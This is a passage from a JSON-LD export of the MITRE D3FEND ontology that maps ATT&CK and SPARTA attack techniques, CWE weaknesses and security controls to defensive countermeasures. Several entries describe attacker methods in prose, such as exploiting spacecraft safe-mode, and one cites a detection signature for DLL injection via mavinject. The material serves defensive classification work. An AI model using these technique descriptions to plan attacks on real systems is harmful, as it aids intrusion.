      "rdfs:label": "Public Key",
      "rdfs:seeAlso": {
        "@id": "dbr:Public-key_cryptography"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AsymmetricKey"
        },
        {
          "@id": "_:N42baffa5b98645c4ae5b7d856da26fb4"
        }
      ]
    },
    {
      "@id": "_:N42baffa5b98645c4ae5b7d856da26fb4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:depends-on"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PrivateKey"
      }
    },
    {
      "@id": "d3f:T1505.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1505.005",
      "d3f:definition": "Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)",
      "rdfs:label": "Terminal Services DLL",
      "rdfs:subClassOf": {
        "@id": "d3f:T1505"
      }
    },
    {
      "@id": "d3f:EX-0011",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0011",
      "d3f:definition": "The adversary times on-board actions to the period when the vehicle is in safe-mode and operating with altered guardrails. In many designs, safe-mode enables contingency command dictionaries, activates alternate receivers or antennas, reduces data rates, and prioritizes survival behaviors (sun-pointing, thermal/power conservation). Authentication checks, anti-replay windows, rate/size limits, and interlocks may differ from nominal; counters can be reset, timetag screening relaxed, or maintenance procedures made available for recovery. Ground cadence also changes, longer passes, emergency scheduling, atypical station selection, creating predictable windows for interaction. Using knowledge of these patterns, an attacker issues maintenance-looking loads, recovery scripts, parameter edits, or boot/patch sequences that the spacecraft is primed to accept while safed. Because responses (telemetry beacons, acknowledgments, mode bits) resemble normal anomaly recovery, the first execution event blends with expected behavior, allowing unauthorized reconfiguration, software modification, or state manipulation to occur under the cover of fault response.",
      "rdfs:label": "Exploit Reduced Protections During Safe-Mode - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0011/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Exploit Reduced Protections During Safe-Mode"
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-003%3ADLLInjectionWithMavinject_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-003/"
      },
      "d3f:kb-abstract": "Injecting a malicious DLL into a process is a common adversary TTP. Although the ways of doing this are numerous, mavinject.exe is a commonly used tool for doing so because it rolls up many of the necessary steps into one, and is available within Windows. Attackers may rename the executable, so we also use the common argument “INJECTRUNNING” as a related signature here. Whitelisting certain applications may be necessary to reduce noise for this analytic.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-003: DLL Injection with Mavinject",
      "rdfs:label": "Reference - CAR-2020-11-003: DLL Injection with Mavinject - MITRE"
    },
    {
      "@id": "d3f:UseCaseProcedure",
      "@type": "owl:Class",
      "rdfs:label": "Use Case Procedure",
      "rdfs:subClassOf": {
        "@id": "d3f:Procedure"
      }
    },
    {
      "@id": "d3f:CWE-234",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-234",
      "d3f:definition": "If too few arguments are sent to a function, the function will still pop the expected number of arguments from the stack. Potentially, a variable number of arguments could be exhausted in a function as well.",
      "rdfs:label": "Failure to Handle Missing Parameter",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-233"
      }
    },
    {
      "@id": "d3f:CCI-000144_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a real-time alert when organization-defined audit failure events occur.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-20T00:00:00"
      },
      "rdfs:label": "CCI-000144"
    },
    {
      "@id": "d3f:FileEncryptionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the application of cryptographic techniques to a file, ensuring its content is securely encoded and inaccessible without proper decryption keys.",
      "rdfs:label": "File Encryption Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Nbed75272b53d4f5985c3d13e099f6ef3"
        }
      ]
    },
    {
      "@id": "_:Nbed75272b53d4f5985c3d13e099f6ef3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:T0872",
      "@type": "owl:Class",
      "d3f:attack-id": "T0872",
      "d3f:definition": "Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.",
      "rdfs:label": "Indicator Removal on Host - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSEvasionTechnique"
      },
      "skos:prefLabel": "Indicator Removal on Host"
    },
    {
      "@id": "d3f:NetworkConnectionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event related to the establishment, maintenance, or termination of a network connection.",
      "rdfs:label": "Network Connection Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/network_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkEvent"
        },
        {
          "@id": "_:Nb10a0050ea68458ab3b8979b8a18b12d"
        }
      ]
    },
    {
      "@id": "_:Nb10a0050ea68458ab3b8979b8a18b12d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkSession"
      }
    },
    {
      "@id": "d3f:POSIXSymbolicLink",
      "@type": "owl:Class",
      "d3f:definition": "A POSIX-compliant symbolic link.  These are often fast symbolic links, but need not be.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Symbolic_link"
      },
      "rdfs:label": "POSIX Symbolic Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SymbolicLink"
        },
        {
          "@id": "d3f:UnixLink"
        }
      ]
    },
    {
      "@id": "d3f:CWE-526",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-526",
      "d3f:definition": "The product uses an environment variable to store unencrypted sensitive information.",
      "rdfs:label": "Cleartext Storage of Sensitive Information in an Environment Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:Endpoint-basedWebServerAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Endpoint-basedWebServerAccessMediation"
      ],
      "d3f:d3fend-id": "D3-EBWSAM",
      "d3f:definition": "Endpoint-based web server access mediation regulates web server access directly from user endpoints by implementing mechanisms such as client-side certificates and endpoint security software to authenticate devices and ensure compliant access.",
      "d3f:kb-article": "## How it works\n\nEndpoint-based Web Server Access Mediation focuses on managing access to web servers directly from user devices. This involves implementing security measures like client certificates or endpoint security software to ensure that only authorized devices can initiate sessions with web servers. Examples include direct access to internal web applications from company laptops.\n",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-41-Revision-1"
      },
      "rdfs:label": "Endpoint-based Web Server Access Mediation",
      "rdfs:subClassOf": {
        "@id": "d3f:WebSessionAccessMediation"
      }
    },
    {
      "@id": "d3f:TA0011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to communicate with compromised systems to control them.\n\nCommand and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim's network structure and defenses.",
      "d3f:display-order": 10,
      "rdfs:label": "Command And Control",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:NTPServerResponseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an NTP server sends time synchronization data to a client, enabling the client to align its local clock with the server's reference time.",
      "rdfs:label": "NTP Server Response Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NTPEvent"
        },
        {
          "@id": "_:Na4a5745e9a6048d2a658d776056ad56e"
        }
      ]
    },
    {
      "@id": "_:Na4a5745e9a6048d2a658d776056ad56e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NTPClientSyncEvent"
      }
    },
    {
      "@id": "d3f:LDIFRecord",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserAccount"
      ],
      "rdfs:label": "LDIF Record"
    },
    {
      "@id": "d3f:Reference-TypeSystems_Princeton",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cs.princeton.edu/courses/archive/fall98/cs441/mainus/node4.html"
      },
      "d3f:kb-organization": "Princeton University",
      "d3f:kb-reference-of": {
        "@id": "d3f:VariableTypeValidation"
      },
      "d3f:kb-reference-title": "Why type checking?",
      "rdfs:label": "Reference - Type Systems"
    },
    {
      "@id": "d3f:HardwareTimer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A hardware timer is defined as an electronic component that serves as an 8-bit or 16-bit counter, capable of measuring time intervals, generating timed outputs, and driving loads through mechanisms such as pulse width modulation (PWM).",
      "rdfs:isDefinedBy": {
        "@id": "https://www.sciencedirect.com/topics/engineering/hardware-timer"
      },
      "rdfs:label": "Hardware Timer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:Timer"
        }
      ]
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForProvidingSoftwareUpdatesToLocalMachines",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10474448B2/en"
      },
      "d3f:kb-author": "John Melton Reynolds",
      "d3f:kb-organization": "Sophos Ltd",
      "d3f:kb-reference-title": "Method and system for providing software updates to local machines",
      "rdfs:label": "Reference - Method and system for providing software updates to local machines"
    },
    {
      "@id": "d3f:WindowsRegistryKeyEvent",
      "@type": "owl:Class",
      "d3f:definition": "Events representing actions performed on Windows Registry keys, such as creation, modification, or deletion, which define hierarchical nodes for storing configuration data.",
      "rdfs:label": "Windows Registry Key Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/win/registry_key_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryEvent"
        },
        {
          "@id": "_:N3e6aac54a9d0415ba5bee6439f70e07b"
        }
      ]
    },
    {
      "@id": "_:N3e6aac54a9d0415ba5bee6439f70e07b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKey"
      }
    },
    {
      "@id": "d3f:process-image-path",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x process-image-path y: The filepath y is the process image path for the process x, indicating the path to the resource from which the process's image was loaded.",
      "rdfs:label": "process-image-path",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-property"
      },
      "skos:altLabel": "processImagePath"
    },
    {
      "@id": "d3f:PhysicalLinkDisconnectEvent",
      "@type": "owl:Class",
      "d3f:definition": "The transmission medium is removed or power is cut, physically breaking the path between the two interfaces.",
      "rdfs:label": "Physical Link Disconnect Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkEvent"
        },
        {
          "@id": "_:Na064735ef68849a9af42225f25d423b7"
        }
      ]
    },
    {
      "@id": "_:Na064735ef68849a9af42225f25d423b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkDownEvent"
      }
    },
    {
      "@id": "d3f:TA0005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to avoid being detected.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics' techniques are cross-listed here when those techniques include the added benefit of subverting defenses.",
      "d3f:display-order": 5,
      "rdfs:label": "Defense Evasion",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:CWE-203",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-203",
      "d3f:definition": "The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not.",
      "d3f:synonym": "Side Channel Attack",
      "rdfs:label": "Observable Discrepancy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:FilePathOpenFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:File"
      },
      "d3f:definition": "Has an input of a file path, and opens a file handle for reading or writing.",
      "d3f:invokes": {
        "@id": "d3f:OpenFile"
      },
      "rdfs:label": "File Path Open Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N9c90b60473a14355809eff58655b00f7"
        },
        {
          "@id": "_:N76318be924a542eab59c2529bbc4bd67"
        }
      ]
    },
    {
      "@id": "_:N9c90b60473a14355809eff58655b00f7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N76318be924a542eab59c2529bbc4bd67",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OpenFile"
      }
    },
    {
      "@id": "d3f:Reference-FirewallsThatFilterBasedUponProtocolCommands_IntelCorp",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US6832256B1"
      },
      "d3f:kb-abstract": "Data transfer is controlled between a first network and a second network of computers by a firewall-proxy combination. Active interpretation of protocol commands exchanged between the first network and the second network is performed to determine specific actions concerning completion of the protocol request. This active firewall-proxy combination may exist on either the first or second network of computers. This method of control provides centralized control and administration for all potentially reachable resources within a network.",
      "d3f:kb-author": "James E. Toga",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Intel Corp",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Firewalls that filter based upon protocol commands",
      "rdfs:label": "Reference - Firewalls that filter based upon protocol commands - Intel Corp"
    },
    {
      "@id": "d3f:Semi-supervisedManifoldLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSML",
      "d3f:definition": "A version of Semi-Supervised Learning that applies the Manifold assumption that the data lie approximately on a manifold of much lower dimension than the input space.",
      "d3f:kb-article": "## References\nWeak supervision. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Weak_supervision#Generative_models).",
      "rdfs:label": "Semi-supervised Manifold Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:IntrinsicallySemi-supervisedLearning"
      }
    },
    {
      "@id": "d3f:CWE-1075",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1075",
      "d3f:definition": "The product performs unconditional control transfer (such as a \"goto\") in code outside of a branching structure such as a switch block.",
      "rdfs:label": "Unconditional Control Flow Transfer outside of Switch Block",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:T1437.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1437.001",
      "d3f:definition": "Adversaries may communicate using application layer protocols associated with web protocols traffic to avoid detection/network filtering by blending in with existing traffic. Commands to remote mobile devices, and often the results of those commands, will be embedded within the protocol traffic between the mobile client and server.",
      "rdfs:label": "Web Protocols - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1437"
      },
      "skos:prefLabel": "Web Protocols"
    },
    {
      "@id": "d3f:CCI-000056_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system retains the session lock until the user reestablishes access using established identification and authentication procedures.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000056"
    },
    {
      "@id": "d3f:T1059.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.004",
      "d3f:definition": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.",
      "rdfs:label": "Unix Shell",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      },
      "skos:altLabel": "Bash Execution"
    },
    {
      "@id": "d3f:WindowsNTGetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtGetThreadContext",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIGetThreadContext"
      }
    },
    {
      "@id": "d3f:REC-0006",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0006",
      "d3f:definition": "Adversaries collect a cradle-to-operations view of how flight software is built, tested, signed, and released. Useful artifacts include architecture docs, source trees and SBOMs, compiler/linker toolchains and flags, RTOS and middleware versions, build scripts, CI/CD pipelines, code-signing workflows, defect trackers, and release notes that describe “as-built” vs. “as-flown” deltas. They also seek integration environments, emulators/SIL, flatsats/iron birds, hardware-in-the-loop rigs, and the autonomy/FDIR logic that governs mode transitions and patch acceptance. With this knowledge, a threat actor can identify weak crypto or provenance controls on update paths, predict error-handling behavior, and craft inputs that slip past unit/integration tests. Even small disclosures (e.g., a linker script, an assert string, or a sanitized crash dump) shrink the search space for exploitation.",
      "rdfs:label": "Gather FSW Development Information - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0006/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather FSW Development Information"
    },
    {
      "@id": "d3f:CWE-142",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-142",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as value delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Value Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-140"
      }
    },
    {
      "@id": "d3f:T1660",
      "@type": "owl:Class",
      "d3f:attack-id": "T1660",
      "d3f:definition": "Adversaries may send malicious content to users in order to gain access to their mobile devices. All forms of phishing are electronically delivered social engineering. Adversaries can conduct both non-targeted phishing, such as in mass malware spam campaigns, as well as more targeted phishing tailored for a specific individual, company, or industry, known as “spearphishing”.  Phishing often involves social engineering techniques, such as posing as a trusted source, as well as evasion techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages.",
      "rdfs:label": "Phishing - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Phishing"
    },
    {
      "@id": "d3f:HomoglyphDetection",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:HomoglyphDetection"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:Email"
        },
        {
          "@id": "d3f:URL"
        }
      ],
      "d3f:d3fend-id": "D3-HD",
      "d3f:definition": "Comparing strings using a variety of techniques to determine if a deceptive or malicious string is being presented to a user.",
      "d3f:kb-article": "## How it works\nA homoglyph, in this context, is a deceptive string or word which looks like a trusted word, but is composed of different characters, for example: goooogle.com versus google.com. This is commonly found in phishing and typo squatting attacks where a human is exploited through a social engineering campaign.\n\n## Considerations\n* In very large environments processing DNS queries can be computationally expensive due to the amount of traffic that is generated\n* Legitimate companies and products use non-dictionary words in their names that could result in many false positives",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Computer-implementedMethodsAndSystemsForIdentifyingVisuallySimilarTextCharacterStrings_GreathornInc"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForDetectingHomoglyphAttacksWithASiameseConvolutionalNeuralNetwork_EndgameInc"
        }
      ],
      "rdfs:label": "Homoglyph Detection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierAnalysis"
        },
        {
          "@id": "_:N916f2bd0bebe4b60b0ca3dd9001d9bd5"
        },
        {
          "@id": "_:Nd9acb6aa55c34bc0961fa12f57f81251"
        }
      ]
    },
    {
      "@id": "_:N916f2bd0bebe4b60b0ca3dd9001d9bd5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "_:Nd9acb6aa55c34bc0961fa12f57f81251",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:DigitalMedia",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Digital media refers to any communication media that operate in conjunction with various encoded machine-readable data formats.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Digital_media",
      "rdfs:label": "Digital Media",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:PasswordManager",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Credential"
      },
      "d3f:definition": "A password manager is a software application or hardware that helps a user store and organize passwords. Password managers usually store passwords encrypted, requiring the user to create a master password: a single, ideally very strong password which grants the user access to their entire password database. Some password managers store passwords on the user's computer (called offline password managers), whereas others store data in the provider's cloud (often called online password managers). However offline password managers also offer data storage in the user's own cloud accounts rather than the provider's cloud. While the core functionality of a password manager is to securely store large collections of passwords, many provide additional features such as form filling and password generation.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Password_manager"
      },
      "rdfs:label": "Password Manager",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Application"
        },
        {
          "@id": "_:N22dea2849e73404ab8e259d7592a221f"
        }
      ]
    },
    {
      "@id": "_:N22dea2849e73404ab8e259d7592a221f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:T1056",
      "@type": "owl:Class",
      "d3f:attack-id": "T1056",
      "d3f:definition": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).",
      "rdfs:label": "Input Capture",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "d3f:CredentialAccessTechnique"
        }
      ]
    },
    {
      "@id": "d3f:ConfigurationInventory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ConfigurationInventory"
      ],
      "d3f:d3fend-id": "D3-CI",
      "d3f:definition": "Configuration inventory identifies and records the configuration of software and hardware and their components throughout the organization.",
      "d3f:inventories": {
        "@id": "d3f:ConfigurationResource"
      },
      "d3f:kb-article": "## How it works\n\nThe organization retrieves configuration information through means of SNMP (MIB records), WBEM (CIM records), other protocols, or custom scripts and captures that information in a repository, typically known as a Configuration Management Database (CMDB).",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Web-BasedEnterpriseManagement"
        },
        {
          "@id": "d3f:Reference-Windows-Management-Infrastructure"
        },
        {
          "@id": "d3f:Reference-Windows-Management-Instrumentation"
        }
      ],
      "rdfs:label": "Configuration Inventory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetInventory"
        },
        {
          "@id": "_:N7c073d073486469686aea0922e4369d5"
        }
      ]
    },
    {
      "@id": "_:N7c073d073486469686aea0922e4369d5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:inventories"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:UserGroupPermissions",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:UserGroupPermissions"
      ],
      "d3f:d3fend-id": "D3F-UGPH",
      "d3f:definition": "Access control where access is determined based on attributes associated with users and the objects being accessed.",
      "d3f:kb-article": "## How it works\n\nAccess is determined based on the attributes associated with subjects (requesters) and the objects being accessed. Each object and subject has a set of associated attributes, such as location, time of creation, and access rights. Access to an object is authorized or denied depending on whether the required correlation can be made between the attributes of that object and those of the requesting subject.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-GuidetoOTSecurity"
      },
      "d3f:restricts": {
        "@id": "d3f:UserGroup"
      },
      "d3f:synonym": "Role Based Access Controls",
      "rdfs:isDefinedBy": {
        "@id": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r3.pdf"
      },
      "rdfs:label": "User Group Permissions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessPolicyAdministration"
        },
        {
          "@id": "_:N07ef1363b20644c2bc8da550e7742839"
        }
      ]
    },
    {
      "@id": "_:N07ef1363b20644c2bc8da550e7742839",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserGroup"
      }
    },
    {
      "@id": "d3f:T1598.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1598.001",
      "d3f:definition": "Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.",
      "rdfs:label": "Spearphishing Service",
      "rdfs:subClassOf": {
        "@id": "d3f:T1598"
      }
    },
    {
      "@id": "d3f:PeripheralFirmware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Firmware that is installed on computer peripheral devices.",
      "rdfs:label": "Peripheral Firmware",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:Firmware"
        },
        {
          "@id": "dbr:Peripheral"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Dynamic Information Flow Control",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(3)"
    },
    {
      "@id": "d3f:Reference-CiscoASR9000AccessListCommands",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cisco.com/c/en/us/td/docs/routers/asr9000/software/asr9k_r4-0/addr_serv/command/reference/ir40asrbook_chapter1.html"
      },
      "d3f:kb-abstract": "An access control list (ACL) consists of one or more access control entries (ACEs) that collectively define the network traffic profile. This profile can then be referenced by Cisco IOS XR Software features such as traffic filtering, priority or custom queueing, and dynamic access control. Each ACL includes an action element (permit or deny) and a filter element based on criteria such as source address, destination address, protocol, and protocol-specific parameters.",
      "d3f:kb-organization": "Cisco",
      "d3f:kb-reference-of": {
        "@id": "d3f:NetworkTrafficPolicyMapping"
      },
      "d3f:kb-reference-title": "Cisco ASR 9000 Series Aggregation Services Routers - Access List Commands",
      "rdfs:label": "Reference - Cisco ASR 9000 Series Aggregation Services Routers - Access List Commands"
    },
    {
      "@id": "d3f:M1036",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "D3-AZET may be related (potentially related, though not called out in the ATT&CK definition).",
      "d3f:related": [
        {
